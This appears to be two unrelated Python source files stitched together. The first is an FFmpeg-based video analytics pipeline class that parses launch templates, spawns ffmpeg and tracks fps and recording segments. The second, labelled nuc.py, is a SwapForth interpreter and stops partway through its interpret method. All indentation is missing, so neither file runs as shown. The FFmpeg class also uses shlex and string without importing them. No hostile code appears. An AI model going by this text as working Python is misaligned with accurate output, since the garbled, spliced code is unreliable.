import subprocess
import time
import copy
from threading import Lock
from threading import Thread
import shutil
import re
from collections import OrderedDict
from collections import namedtuple
from collections import Counter
import json
import os
from datetime import datetime, timedelta
from vaserving.pipeline import Pipeline
from vaserving.common.utils import logging
if shutil.which('ffmpeg') is None:
raise Exception("ffmpeg not installed")
class FFmpegPipeline(Pipeline):
SECONDS_TO_NANOSECONDS = 10**9
GVA_INFERENCE_FILTER_TYPES = ["detect",
"classify"]
FilterPropertyConfig = namedtuple("FilterPropertyConfig",
["name",
"type",
"property",
"enum_values",
"index",
"format"])
VideoFilters = namedtuple("VideoFilters", ["range", "token", "filters"])
VideoFilter = namedtuple("VideoFilter", ["name", "index", "properties"])
Input = namedtuple("Input", ["range", "token", "properties"])
Output = namedtuple("Output", ["range", "token", "format", "properties"])
def __init__(self, identifier, config, model_manager, request, finished_callback, _unused_options):
# TODO: refactor as abstract interface
# pylint: disable=super-init-not-called
self.config = config
self.models = model_manager.models
self.model_manager = model_manager
self.template = config['template']
self.identifier = identifier
self._process = None
self.start_time = None
self.stop_time = None
self._ffmpeg_launch_string = None
self.request = request
self.state = Pipeline.State.QUEUED
self.fps = 0
self._finished_callback = finished_callback
self._logger = logging.get_logger('FFmpegPipeline', is_static=True)
self._fps_regex = re.compile(
r"\s*frame=\s*(?P<frame_count>\d+)\s*fps=\s*(?P<fps>\d+\.?\d*).*"
r"time=(?P<duration>\d+:\d+:\d+\.\d+).*speed=\s*(?P<speed>\d+\.\d+)x")
self._recording_started_regex = re.compile(
r"\[segment @ 0x.*?\] Opening '(.*?)' for writing")
self._recording_prefix = None
self._current_recording = None
self._stream_base = None
self._real_base = None
self._temp_recording_dir = None
self._recording_dir = None
self._ffmpeg_args = None
self._video_filters = None
self._inputs = None
self._outputs = None
self._create_delete_lock = Lock()
self._video_filter_index = Counter()
self._video_filter_map = {}
self._output_format_index = Counter()
self._output_format_map = {}
self.pipeline_type = "FFmpeg"
def stop(self):
with self._create_delete_lock:
if (not self.state.stopped()):
self.state = Pipeline.State.ABORTED
return self.status()
def params(self):
# TODO: refactor common code
request = copy.deepcopy(self.request)
if "models" in request:
del request["models"]
params_obj = {
"id": self.identifier,
"request": request,
"type": self.config["type"],
"launch_command": self._ffmpeg_launch_string
}
return params_obj
def status(self):
self._logger.debug("Called Status")
if self.stop_time is not None:
elapsed_time = self.stop_time - self.start_time
elif self.start_time is not None:
elapsed_time = time.time() - self.start_time
else:
elapsed_time = None
status_obj = {
"id": self.identifier,
"state": self.state,
"avg_fps": self.fps,
"start_time": self.start_time,
"elapsed_time": elapsed_time
}
return status_obj
@staticmethod
def validate_config(config):
pass
def _get_fps(self, next_line):
# Note: ffmpeg doesn't immediately report fps
# which can cause issues for short clips
# We calculate it if fps is 0 otherwise we
# report what ffmpeg provides
matched = self._fps_regex.match(next_line)
if (matched):
fps = float(matched.group('fps'))
if (fps > 0):
self.fps = fps
return
speed = float(matched.group("speed"))
frame_count = int(matched.group("frame_count"))
time_value = datetime.strptime(
matched.group("duration"), "%H:%M:%S.%f")
duration = timedelta(
hours=time_value.hour,
minutes=time_value.minute,
seconds=time_value.second,
microseconds=time_value.microsecond)
self.fps = (frame_count / (duration.total_seconds())) * speed
def _check_for_started_recording(self, next_line):
# We check when a new segment is started to indicate
# when the current segment is complete and can be moved
if self._recording_prefix:
matched = self._recording_started_regex.match(next_line)
if (matched):
self._move_current_recording()
self._current_recording = matched.groups()[0]
def _get_stream_time(self, recording):
args = ["ffprobe", "-show_entries", "stream=start_time",
"-print_format", "json", "-v", "quiet", "-hide_banner", recording]
result = json.loads(subprocess.check_output(args))
if (('streams' in result) and
(len(result['streams']) > 0) and
('start_time' in result['streams'][0])):
start_time = int(float(result['streams'][0]['start_time']) * 10**9)
if (not self._stream_base):
self._stream_base = start_time
return start_time - self._stream_base
def _move_current_recording(self):
if (self._current_recording):
stream_time = self._get_stream_time(self._current_recording)
adjusted_time = self._real_base + stream_time
local_time = time.localtime(
adjusted_time / FFmpegPipeline.SECONDS_TO_NANOSECONDS)
dir_name = time.strftime(
"{}/%Y/%m/%d".format(self._recording_prefix), local_time)
if (dir_name != self._recording_dir):
os.makedirs(dir_name, exist_ok=True)
self._recording_dir = dir_name
filename = "{dirname}/{adjustedtime}_{time}.mp4".format(
dirname=dir_name,
adjustedtime=adjusted_time,
time=stream_time)
os.rename(self._current_recording, filename)
def _spawn(self, args):
self._logger.debug("Launching: %s ", ' '.join(args))
with self._create_delete_lock:
if not self.state is Pipeline.State.ABORTED:
self._process = subprocess.Popen(args, #pylint: disable=consider-using-with
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
bufsize=1,
universal_newlines=True)
self.state = Pipeline.State.RUNNING
else:
self._finished_callback()
return
self._process.poll()
while self._process.returncode is None and not self.state is Pipeline.State.ABORTED:
next_line = self._process.stderr.readline()
self._logger.debug(next_line)
self._get_fps(next_line)
self._check_for_started_recording(next_line)
self._process.poll()
self.stop_time = time.time()
with self._create_delete_lock:
if self.state is Pipeline.State.ABORTED:
self._process.kill()
else:
if self._process.returncode == 0:
self.state = Pipeline.State.COMPLETED
else:
self.state = Pipeline.State.ERROR
self._process = None
self._finished_callback()
def _get_filter_properties(self, _filter):
result = {}
params = re.split("=|:", _filter)
result['_TYPE_'] = params[0]
result['_ORIG_'] = _filter
for x in range(1, len(params[0:]), 2):
result[params[x]] = params[x + 1]
return result
def _join_filter_params(self, filter_type, filter_params):
parameters = ["%s=%s" % (x, y) for (x, y) in filter_params.items()]
return "{filter_type}={params}".format(filter_type=filter_type, params=':'.join(parameters))
def _set_default_models(self):
for video_filters in self._video_filters:
for _filter_key, _filter in video_filters.filters.items():
if ((_filter_key[0] in FFmpegPipeline.GVA_INFERENCE_FILTER_TYPES)
and ("VA_DEVICE_DEFAULT" in _filter.properties['model'])):
if "device" not in _filter.properties:
_filter.properties["device"] = "CPU"
_filter.properties["model"] = self.model_manager.get_default_network_for_device(
_filter.properties["device"], _filter.properties["model"])
self._logger.debug("Setting model to {} for filter {}".format(
_filter.properties["model"], _filter_key))
def _set_model_proc(self):
for video_filters in self._video_filters:
for _filter_key, _filter in video_filters.filters.items():
if ((_filter_key[0] in FFmpegPipeline.GVA_INFERENCE_FILTER_TYPES)):
if "model_proc" not in _filter.properties:
model_proc = None
if _filter.properties["model"] in self.model_manager.model_procs:
model_proc = self.model_manager.model_procs[_filter.properties["model"]]
if model_proc is not None:
_filter.properties["model_proc"] = model_proc
self._logger.debug("Setting model proc to {} for filter {}".format(
model_proc, _filter_key))
def _unescape_args(self, args):
for i, arg in enumerate(args):
args[i] = arg.replace(
'_COLON_', ':') if isinstance(arg, str) else arg
def _escape_source(self):
if "source" in self.request and "uri" in self.request["source"]:
self.request["source"]["uri"] = self.request["source"]["uri"].replace(
':', '_COLON_')
def _unescape_source(self):
if "source" in self.request and "uri" in self.request["source"]:
self.request["source"]["uri"] = self.request["source"]["uri"].replace(
'_COLON_', ':')
def _get_filter_property_config(self, _filter, config):
enum_values = None
if (("enum" in config) and ("values" in _filter)):
enum_values = dict(zip(config["enum"], _filter["values"]))
return FFmpegPipeline.FilterPropertyConfig(_filter["name"],
_filter["type"],
_filter.get(
"property", None),
enum_values,
_filter.get("index", 0),
_filter.get("format", None))
def _set_video_filter_property(self, _filter, _value):
key = (_filter.name, _filter.index)
if (key in self._video_filter_map):
if (_filter.enum_values):
_value = _filter.enum_values[_value]
if (_filter.format == 'json'):
_value = "\'{}\'".format(json.dumps(
_value).replace(':', r'\:'))
self._logger.debug("Setting filter: {}, property: {}, value: {}".format(
key,
_filter.property,
_value))
self._video_filter_map[key].properties[_filter.property] = _value
def _set_input_property(self, _filter, _value):
if (_filter.index < len(self._inputs)):
_input = self._inputs[_filter.index]
if (_filter.enum_values):
_value = _filter.enum_values[_value]
if (_filter.format == 'json'):
_value = "\'{}\'".format(json.dumps(
_value).replace(':', r'\:'))
if (_filter.property.endswith("_ARG_")):
_input.properties["_ARGS_"] = ([
_value
if arg == _filter.property else arg
for arg in _input.properties["_ARGS_"]
])
self._logger.debug("Setting input: {}, property: {}, value: {}".format(
(_filter.name, _filter.index),
_filter.property,
_value))
def _set_output_property(self, _filter, _value):
key = (_filter.name, _filter.index)
if (key in self._output_format_map):
_output = self._output_format_map[key]
if (_filter.enum_values):
_value = _filter.enum_values[_value]
if (_filter.format == 'json'):
_value = "\'{}\'".format(json.dumps(
_value).replace(':', r'\:'))
if ((_filter.name == "metapublish" and _filter.property == "_METAPUBLISH_ARG_") and
(not _output.properties["_ARGS_"])):
_output.properties["_ARGS_"].append("_METAPUBLISH_ARG_")
if (_filter.property.endswith("_ARG_")):
_output.properties["_ARGS_"] = ([
_value
if arg == _filter.property else arg
for arg in _output.properties["_ARGS_"]
])
else:
_output.properties[_filter.property] = _value
self._logger.debug("Setting Output: {}, property: {}, value: {}".format(
key,
_filter.property,
_value))
def _set_filter_property(self, _filter, _value):
if (_filter.type == "video"):
self._set_video_filter_property(_filter, _value)
elif(_filter.type == "input"):
self._set_input_property(_filter, _value)
elif(_filter.type == "output"):
self._set_output_property(_filter, _value)
def _set_section_properties(self, request_section, config_section):
request, config = Pipeline.get_section_and_config(
self.request, self.config, request_section, config_section)
for key in config:
if isinstance(config[key], dict) and "filter" in config[key]:
if key in request:
if isinstance(config[key]["filter"], list):
filter_properties = [self._get_filter_property_config(x, config[key])
for x in config[key]["filter"]]
else:
filter_properties = [self._get_filter_property_config(
config[key]["filter"], config[key])]
for _filter in filter_properties:
self._set_filter_property(_filter, request[key])
def _set_properties(self):
self._set_section_properties(["parameters"],
["parameters", "properties"])
self._set_section_properties(["destination"],
["destination", "properties"])
if "destination" in self.request and \
"metadata" in self.request["destination"] and \
"type" in self.request["destination"]["metadata"]:
self._set_section_properties(["destination", "metadata"],
["destination", "metadata",
self.request["destination"]["metadata"]["type"],
"properties"])
self._set_section_properties(["source"],
["source", "properties"])
if "source" in self.request and "type" in self.request["source"]:
self._set_section_properties(["source"],
["source", self.request["source"]["type"], "properties"])
self._set_section_properties([], [])
def _get_outputs(self, args):
# pylint: disable=unsupported-assignment-operation,unsubscriptable-object
result = []
args_remaining = len(args)
indices = [args_remaining - (x + 1) for x in range(len(args))]
current_output_properties = None
current_output_list = None
current_start = None
while(args_remaining):
index = indices[args_remaining - 1]
if (current_output_properties is not None):
if args[index].startswith('-'):
if (current_output_list is None):
current_output_properties[args[index]
] = args[index + 1]
args_remaining -= 2
continue
output_index = self._output_format_index[args[current_start + 1]]
output = FFmpegPipeline.Output((current_start, index - 1), "-f",
args[current_start + 1],
current_output_properties)
result.append(output)
self._output_format_map[(
args[current_start + 1], output_index)] = output
self._output_format_index[args[current_start + 1]] += 1
current_output_list = None
current_output_properties = None
current_start = None
else:
current_output_list = current_output_properties["_ARGS_"]
current_output_list.append(args[index])
args_remaining -= 1
continue
if (args[index] == '-f'):
current_start = index
current_output_properties = {}
current_output_properties["_ARGS_"] = []
args_remaining -= 2
index = index + 1
continue
args_remaining -= 1
if (current_output_properties is not None):
output_index = self._output_format_index[args[current_start + 1]]
output = self.Output((current_start, index), "-f",
args[current_start + 1], current_output_properties)
result.append(output)
self._output_format_map[(
args[current_start + 1], output_index)] = output
self._output_format_index[args[current_start + 1]] += 1
return result
def _get_video_filters(self, args):
result = OrderedDict()
vf_index = args.index('-vf') if ('-vf' in args) else None
if vf_index is None:
return result
filters = args[vf_index + 1].split(',')
for _filter in filters:
properties = self._get_filter_properties(_filter)
filter_type = properties.pop('_TYPE_')
index = self._video_filter_index[filter_type]
video_filter = FFmpegPipeline.VideoFilter(
filter_type, index, properties)
result[(filter_type, index)] = video_filter
self._video_filter_map[(filter_type, index)] = video_filter
self._video_filter_index[filter_type] += 1
return [FFmpegPipeline.VideoFilters((vf_index, vf_index + 1), '-vf', result)]
def _get_inputs(self, args):
result = []
for i, arg in enumerate(args):
if arg == '-i':
result.append(FFmpegPipeline.Input(
(i, i + 1), arg, {'_ARGS_': [args[i + 1]]}))
return result
def _parse_ffmpeg_launch_string(self, launch_string):
# TODO: Fully parse ffmpeg syntax
self._ffmpeg_args = ['ffmpeg']
self._ffmpeg_args.extend(shlex.split(launch_string))
self._video_filters = self._get_video_filters(self._ffmpeg_args)
self._outputs = self._get_outputs(self._ffmpeg_args)
self._inputs = self._get_inputs(self._ffmpeg_args)
def _generate_input(self, _input):
_input.properties["_ARGS_"].insert(0, '-i')
return _input.properties["_ARGS_"]
def _join_video_filter_properties(self, filter_type, filter_params):
parameters = ["%s=%s" % (x, y) for (x, y) in filter_params.items()]
return "{filter_type}={params}".format(filter_type=filter_type, params=':'.join(parameters))
def _generate_video_filter(self, video_filter):
result = [video_filter.token]
gva_filter_types = FFmpegPipeline.GVA_INFERENCE_FILTER_TYPES + \
["metaconvert"]
filter_components = []
for (name, _index), _filter in video_filter.filters.items():
if (name in gva_filter_types):
_filter.properties.pop("_ORIG_")
if (name == "metaconvert"):
if "converter" not in _filter.properties:
_filter.properties["converter"] = "json"
if "method" not in _filter.properties:
_filter.properties["method"] = "all"
if "source" in _filter.properties:
_filter.properties["source"] = "\'{}\'".format(
_filter.properties["source"]).replace('_COLON_', r'\:')
filter_components.append(
self._join_video_filter_properties(name, _filter.properties))
else:
filter_components.append(_filter.properties["_ORIG_"])
result.append(','.join(filter_components))
return result
def _generate_output(self, _output):
result = [_output.token, _output.format]
args = _output.properties.pop("_ARGS_")
args = [arg for arg in args if not arg.endswith("_ARG_")]
kafka_hosts = (_output.properties.pop("_METAPUBLISH_KAFKA_HOST_")
if "_METAPUBLISH_KAFKA_HOST_" in _output.properties else None)
kafka_topic = (_output.properties.pop("_METAPUBLISH_KAFKA_TOPIC_")
if "_METAPUBLISH_KAFKA_TOPIC_" in _output.properties else None)
if (kafka_hosts) and (kafka_topic):
args.extend(["kafka://{}/{}".format(host, kafka_topic)
for host in kafka_hosts.split(',')])
for option, value in _output.properties.items():
result.append("-{}".format(option)
if not option.startswith('-') else option)
result.append(value)
result.extend(args)
return result
def _generate_ffmpeg_launch_args(self):
args_remaining = len(self._ffmpeg_args)
indices = [args_remaining - (x + 1)
for x in range(len(self._ffmpeg_args))]
result = []
generators = [(_input, self._generate_input)
for _input in self._inputs]
generators.extend([(_output, self._generate_output)
for _output in self._outputs])
generators.extend([(_video_filter, self._generate_video_filter)
for _video_filter in self._video_filters])
while(args_remaining):
index = indices[args_remaining - 1]
consumed = False
for token, generate in generators:
if (index == token.range[0]):
result.extend(generate(token))
args_remaining -= token.range[1] - token.range[0] + 1
consumed = True
generators.remove((token, generate))
break
if (not consumed):
result.append(self._ffmpeg_args[index])
args_remaining -= 1
self._ffmpeg_args = result
self._unescape_args(self._ffmpeg_args)
self._ffmpeg_args = [str(x) for x in self._ffmpeg_args]
def _set_real_base(self, metaconvert):
self._real_base = int(
time.clock_gettime(time.CLOCK_REALTIME) *
FFmpegPipeline.SECONDS_TO_NANOSECONDS)
if ("tags" not in self.request):
self.request["tags"] = {}
self.request["tags"]["real_base"] = self._real_base
properties = self._video_filter_map[metaconvert].properties
properties["tags"] = "\'{}\'".format(
json.dumps(self.request["tags"]).replace(':', r'\:'))
def _set_recording_prefix(self, segment):
self._recording_prefix = os.path.abspath(
self.request['parameters']['recording_prefix'])
self._temp_recording_dir = os.path.join(os.path.dirname(
self._recording_prefix), "tmp_recording/{}".format(self.identifier))
try:
shutil.rmtree(self._temp_recording_dir)
except OSError as exception:
self._logger.warning(str(exception))
try:
os.makedirs(self._temp_recording_dir)
except Exception as exception:
self._logger.warning(str(exception))
properties = self._output_format_map[segment].properties
properties['_ARGS_'] = [os.path.join(
self._temp_recording_dir, "temp_recording_%d.mp4")]
def _initialize_segment_recording(self):
segment_key = ("segment", 0)
if (segment_key in self._output_format_map):
metaconvert_key = ("metaconvert", 0)
if (metaconvert_key in self._video_filter_map):
self._set_real_base(metaconvert_key)
if (('parameters' in self.request)
and ('recording_prefix' in self.request['parameters'])):
self._set_recording_prefix(segment_key)
def start(self):
with(self._create_delete_lock):
if (self.start_time is not None):
return
self._logger.debug("Starting Pipeline %s", self.identifier)
self.request["models"] = self.models
self._escape_source()
self._ffmpeg_launch_string = string.Formatter().vformat(
self.template, [], self.request)
self._parse_ffmpeg_launch_string(self._ffmpeg_launch_string)
self._set_properties()
self._set_default_models()
self._set_model_proc()
self._initialize_segment_recording()
self._generate_ffmpeg_launch_args()
self._unescape_source()
thread = Thread(target=self._spawn, args=[self._ffmpeg_args])
self.start_time = time.time()
thread.start()
|
nuc.py
|
from __future__ import print_function
from __future__ import division
import sys
import getopt
import struct
from functools import partial
import operator
import array
import copy
import time
import re
if sys.version_info[0] < 3:
input = raw_input
sys.path.append("../shell")
import swapforth
def truth(pred):
return [0, -1][pred]
def setimmediate(func):
func.is_immediate = True
return func
def ba(x):
if type(x) == str:
return array.array('B', [ord(c) for c in x])
elif type(x) == bytes:
return array.array('B', x)
else:
return array.array('B', str(x))
class ForthException(Exception):
def __init__(self, value):
self.value = value
class SwapForth:
def __init__(self, CELL = 4, ENDIAN = '<'):
self.d = [] # data stack
self.r = [] # return stack
self.dict = {} # the dictionary
self.xts = [] # execution token (xt) table
self.ip = 0 # instruction pointer for inner interpreter
self.loopC = 0 # loop count
self.loopL = 0 # loop limit
self.leaves = [] # tracking LEAVEs from DO..LOOP
self.ram = array.array('B') # memory
self.out = sys.stdout.write # default console output
self.CELL = CELL
self.CSIGN = (256 ** self.CELL) >> 1 # Sign bit mask
self.CMASK = (256 ** self.CELL) - 1 # Cell mask
self.cellfmt = ENDIAN + {2: 'h', 4: 'i', 8: 'q'}[self.CELL]
def allot(n, d):
r = partial(self.lit, len(self.ram))
r.__doc__ = d
self.ram.extend([0] * n)
return r
self.tib = allot(256, "TIB")
self.sourcea = allot(self.CELL, "SOURCEA")
self.sourcec = allot(self.CELL, "SOURCEC")
self.sourceid = allot(self.CELL, "SOURCEID")
self.to_in = allot(self.CELL, ">IN")
self.base = allot(self.CELL, "BASE")
self.state = allot(self.CELL, "STATE")
# Run through own bound methods, adding each to the dict
isforth = re.compile(r"[A-Z0-9<>=\-\[\],@!:;+?/*]+$")
for name in dir(self):
o = getattr(self, name)
if not isforth.match(name) and o.__doc__:
# name was not a valid Forth name; try start of the docstring
name = o.__doc__.split()[0]
if callable(o) and isforth.match(name):
self.dict[name] = o
self.DECIMAL()
def u32(self, x):
return x & self.CMASK
def w32(self, x):
x += self.CSIGN
x &= self.CMASK
x -= self.CSIGN
return x
def lit(self, n):
""" push literal N on the stack """
self.d.append(n)
def popn(self, n):
r = self.d[-n:]
self.d = self.d[:-n]
return r
def q(self, s):
for w in s.split():
if w in self.dict:
self.dict[w]()
else:
self.lit(int(w))
def binary(self, op):
b = self.d.pop()
self.d[-1] = self.w32(op(self.d[-1], b))
def dpop(self):
r = self.d.pop() << (8 * self.CELL)
r += self.d.pop() & self.CMASK
return r
def dlit(self, d):
self.lit(self.w32(d & self.CMASK))
self.lit(self.w32(d >> (8 * self.CELL)))
def pops(self):
n = self.d.pop()
a = self.d.pop()
return self.ram[a:a+n].tostring().decode("utf-8")
# Start of Forth words
#
# If the word is a legal Python identifier, then
# use that name. Otherwise (e.g. '+') the Forth name is in
# the docstring.
def HERE(self):
self.lit(len(self.ram))
def THROW(self):
e = self.d.pop()
if e:
raise ForthException(e)
def CATCH(self):
self.q('SOURCEA @ SOURCEC @ >IN @')
self.q('SOURCEID @ >R')
source_spec = self.popn(3)
(ds,rs,ip) = (len(self.d) - 1, len(self.r), self.ip)
try:
self.EXECUTE()
except ForthException as e:
if len(self.d) > ds:
self.d = self.d[:ds]
else:
self.d = self.d + [0] * (ds - len(self.d))
self.r = self.r[:rs]
self.ip = ip
self.lit(source_spec[0])
self.lit(source_spec[1])
self.lit(source_spec[2])
self.q('R> SOURCEID !')
self.q('>IN ! SOURCEC ! SOURCEA !')
self.lit(e.value)
else:
self.lit(0)
def cell_plus(self):
""" CELL+ """
self.d[-1] += self.CELL
def DEPTH(self):
self.lit(len(self.d))
def SOURCE(self):
self.sourcea()
self.fetch()
self.sourcec()
self.fetch()
def fetch(self):
""" @ """
a = self.d.pop()
self.lit(*struct.unpack(self.cellfmt, self.ram[a:a + self.CELL]))
def c_fetch(self):
""" C@ """
a = self.d.pop()
self.lit(self.ram[a])
def store(self):
""" ! """
a = self.d.pop()
x = self.d.pop()
self.ram[a:a + self.CELL] = array.array('B', struct.pack(self.cellfmt, x))
def c_store(self):
""" C! """
a = self.d.pop()
x = self.d.pop()
self.ram[a] = x & 0xff
def comma(self):
""" , """
self.ram.extend(ba(struct.pack(self.cellfmt, self.d.pop())))
def c_comma(self):
""" C, """
self.ram.extend([self.d.pop()])
def slash_string(self):
""" /STRING """
n = self.d.pop()
self.d[-2] += n
self.d[-1] -= n
def PARSE(self):
delim = self.d.pop()
self.q('SOURCE >IN @ /STRING')
self.q('OVER >R')
while True:
if self.d[-1] == 0:
break
if (self.ram[self.d[-2]]) == delim:
break
self.lit(1)
self.slash_string()
self.q('2DUP 1 MIN + SOURCE DROP - >IN !')
self.q('DROP R> TUCK -')
def parse_name(self):
""" PARSE-NAME """
self.q('SOURCE >IN @ /STRING')
def skip(pred):
while True:
if self.d[-1] == 0:
break
if not pred(self.ram[self.d[-2]]):
break
self.lit(1)
self.slash_string()
skip(lambda x: x == 32)
self.q('OVER >R')
skip(lambda x: x != 32)
self.q('2DUP 1 MIN + SOURCE DROP - >IN !')
self.q('DROP R> TUCK -')
def DUP(self):
self.d.append(self.d[-1])
def DROP(self):
self.d.pop()
def NIP(self):
self.d.pop(-2)
def two_drop(self):
""" 2DROP """
self.d.pop()
self.d.pop()
def SWAP(self):
(self.d[-2], self.d[-1]) = (self.d[-1], self.d[-2])
def two_swap(self):
""" 2SWAP """
(self.d[-4], self.d[-3], self.d[-2], self.d[-1]) = (self.d[-2], self.d[-1], self.d[-4], self.d[-3])
def two_over(self):
""" 2OVER """
self.lit(self.d[-4])
self.lit(self.d[-4])
def OVER(self):
self.lit(self.d[-2])
def TUCK(self):
self.SWAP()
self.OVER()
def two_dup(self):
""" 2DUP """
self.d += self.d[-2:]
def to_r(self):
""" >R """
self.r.append(self.d.pop())
def r_from(self):
""" R> """
self.d.append(self.r.pop())
def r_fetch(self):
""" R@ """
self.d.append(self.r[-1])
def n_to_r(self):
""" N>R """
n = self.d.pop()
if n:
self.r += self.d[-n:]
self.d = self.d[:-n]
self.r.append(n)
def n_r_from(self):
""" NR> """
n = self.r.pop()
if n:
self.d += self.r[-n:]
self.r = self.r[:-n]
self.lit(n)
def plus(self):
""" + """
self.binary(operator.__add__)
def minus(self):
""" - """
self.binary(operator.__sub__)
def _and(self):
""" AND """
self.binary(operator.__and__)
def _or(self):
""" OR """
self.binary(operator.__or__)
def _xor(self):
""" XOR """
self.binary(operator.__xor__)
def LSHIFT(self):
self.binary(operator.__lshift__)
def RSHIFT(self):
self.binary(lambda a, b: (a & self.CMASK) >> b)
def two_slash(self):
""" 2/ """
self.d[-1] >>= 1
def equal(self):
""" = """
self.binary(lambda a, b: truth(a == b))
def less_than(self):
""" < """
self.binary(lambda a, b: truth(a < b))
def u_less_than(self):
""" U< """
self.binary(lambda a, b: truth((a & self.CMASK) < (b & self.CMASK)))
def NEGATE(self):
self.d[-1] = self.w32(-self.d[-1])
def INVERT(self):
self.d[-1] = self.w32(self.d[-1] ^ self.CMASK)
def MIN(self):
self.lit(min(self.d.pop(), self.d.pop()))
def MAX(self):
self.lit(max(self.d.pop(), self.d.pop()))
def dplus(self):
""" D+ """
self.dlit(self.dpop() + self.dpop())
def u_m_star(self):
""" UM* """
self.dlit(self.u32(self.d.pop()) * self.u32(self.d.pop()))
def star(self):
""" * """
self.binary(operator.__mul__)
def u_m_slash_mod(self):
""" UM/MOD """
u1 = self.u32(self.d.pop())
ud = self.dpop() & (65536**self.CELL - 1)
self.lit(self.w32(ud % u1))
self.lit(self.w32(ud // u1))
def MS(self):
time.sleep(0.001 * self.d.pop())
def EMIT(self):
self.out(chr(self.d.pop()))
def CR(self):
self.lit(ord('\n'))
self.EMIT()
def SPACE(self):
self.lit(ord(' '))
self.EMIT()
def BL(self):
self.lit(ord(' '))
def WORDS(self):
self.out(" ".join(self.dict))
def xt(self, c):
if not c in self.xts:
self.xts.append(c)
return self.xts.index(c) + 1000
def SFIND(self):
(a, n) = self.d[-2:]
s = self.ram[a:a+n].tostring().decode("utf-8").upper()
# print('HERE', s.decode("utf-8"), self.dict)
if s in self.dict:
x = self.dict[s]
self.d[-2] = self.xt(x)
if hasattr(x, 'is_immediate'):
self.d[-1] = 1
else:
self.d[-1] = -1
else:
self.lit(0)
def EXECUTE(self):
x = self.d.pop()
self.xts[x - 1000]()
@setimmediate
def left_paren(self):
""" [ """
self.lit(0)
self.state()
self.store()
def right_paren(self):
""" ] """
self.lit(1)
self.state()
self.store()
def inner(self, code):
save = self.ip
self.ip = 0
while self.ip < len(code):
c = code[self.ip]
self.ip += 1
c()
self.ip = save
def MARKER(self):
self.parse_name()
name = self.pops().upper()
def restore(here, dict):
del self.ram[here:]
self.dict = dict
self.dict[name] = partial(restore, len(self.ram), copy.copy(self.dict))
def mkheader(self):
self.parse_name()
self.code = []
self.defining = self.pops().upper()
def colon(self):
""" : """
self.mkheader()
self.right_paren()
def endcolon():
self.lastword = partial(self.inner, self.code)
if self.defining in self.dict:
print('warning: refining %s' % self.defining)
self.dict[self.defining] = self.lastword
self.dosemi = endcolon
@setimmediate
def semicolon(self):
""" ; """
self.dosemi()
self.left_paren()
@setimmediate
def RECURSE(self):
self.code.append(partial(self.inner, self.code))
def noname(self):
""" :NONAME """
self.code = []
self.right_paren()
def endnoname():
self.lit(self.xt(partial(self.inner, self.code)))
self.dosemi = endnoname
def IMMEDIATE(self):
setattr(self.lastword, 'is_immediate', True)
@setimmediate
def does(self):
""" DOES> """
def dodoes(code):
del self.code[1:]
self.code.append(partial(self.inner, code))
dobody = []
self.code.append(partial(dodoes, dobody))
self.semicolon()
self.right_paren()
self.code = dobody
self.dosemi = lambda: 0
def to_body(self):
""" >BODY """
code = self.xts[self.d.pop() - 1000].args[0]
code0 = code[0]
self.inner([code0])
def ALLOT(self):
self.ram.extend(ba(chr(0) * self.d.pop()))
@setimmediate
def POSTPONE(self):
self.parse_name()
self.SFIND()
if self.d[-1] == 0:
self.DROP()
assert 0, "Bad postpone %s" % self.pops()
if self.d.pop() < 0:
self.LITERAL()
self.lit(self.xt(self.compile_comma))
self.compile_comma()
def EXIT(self):
self.ip = 99999999;
def ACCEPT(self):
(a, n) = self.popn(2)
s = input()[:n]
ns = len(s)
self.ram[a:a + ns] = s
self.lit(ns)
def to_number(self, base = None):
""" >NUMBER """
if base is None:
self.base()
self.fetch()
base = self.d.pop()
(a, n) = self.popn(2)
ud2 = self.dpop()
try:
while n:
ud2 = base * ud2 + int(chr(self.ram[a]), base)
a += 1
n -= 1
except ValueError:
pass
self.dlit(ud2)
self.lit(a)
self.lit(n)
def DECIMAL(self):
self.lit(10)
self.base()
self.store()
def compile_comma(self):
""" COMPILE, """
self.code.append(self.xts[self.d.pop() - 1000])
def branch(self, x):
self.ip = x
def zbranch(self, x):
if self.d.pop() == 0:
self.ip = x
@setimmediate
def BEGIN(self):
self.lit(len(self.code))
@setimmediate
def AGAIN(self):
self.code.append(partial(self.branch, self.d.pop()))
@setimmediate
def AHEAD(self):
self.lit(len(self.code))
self.code.append(self.branch)
@setimmediate
def m_if(self):
""" IF """
self.lit(len(self.code))
self.code.append(self.zbranch)
@setimmediate
def THEN(self):
p = self.d.pop()
self.code[p] = partial(self.code[p], len(self.code))
@setimmediate
def UNTIL(self):
self.code.append(partial(self.zbranch, self.d.pop()))
@setimmediate
def LITERAL(self):
self.code.append(partial(self.lit, self.d.pop()))
def dodo(self):
self.r.append(self.loopC)
self.r.append(self.loopL)
self.loopC = self.d.pop()
self.loopL = self.d.pop()
def qdodo(self):
self.r.append(self.loopC)
self.r.append(self.loopL)
self.loopC = self.d[-1]
self.loopL = self.d[-2]
self._xor()
def doloop(self):
before = self.w32(self.loopC - self.loopL) < 0
inc = self.d.pop()
self.loopC = self.w32(self.loopC + inc)
after = self.w32(self.loopC - self.loopL) < 0
if inc > 0:
finish = before > after
else:
finish = before < after
self.lit(finish)
@setimmediate
def DO(self):
self.leaves.append([])
self.code.append(self.dodo)
self.lit(len(self.code))
@setimmediate
def LOOP(self):
self.lit(1)
self.LITERAL()
self.plus_loop()
@setimmediate
def plus_loop(self):
""" +LOOP """
self.code.append(self.doloop)
self.UNTIL()
leaves = self.leaves.pop()
for p in leaves:
self.code[p] = partial(self.code[p], len(self.code))
self.code.append(self.UNLOOP)
@setimmediate
def question_do(self):
""" ?DO """
self.code.append(self.qdodo)
self.leaves.append([len(self.code)])
self.code.append(self.zbranch)
self.lit(len(self.code))
return
self.code.append(self.two_dup)
self.code.append(self.equal)
self.leaves.append([len(self.code)])
self.code.append(self.zbranch)
self.code.append(self.dodo)
self.lit(len(self.code))
def I(self):
self.lit(self.loopC)
def J(self):
self.lit(self.r[-2])
def UNLOOP(self):
self.loopL = self.r.pop()
self.loopC = self.r.pop()
def QUIT(self):
print('QUIT')
raise swapforth.Bye
@setimmediate
def LEAVE(self):
self.leaves[-1].append(len(self.code))
self.code.append(self.branch)
def EVALUATE(self):
self.q('SOURCE >R >R >IN @ >R')
self.q('SOURCEID @ >R -1 SOURCEID !')
self.q('SOURCEC ! SOURCEA ! 0 >IN !')
self.interpret()
self.q('R> SOURCEID !')
self.q('R> >IN ! R> SOURCEA ! R> SOURCEC !')
def source_id(self):
""" SOURCE-ID """
self.q('SOURCEID @')
def interpret(self):
def consume1(c):
if self.d[-1] != 0:
r = self.ram[self.d[-2]] == c
else:
r = 0
if r:
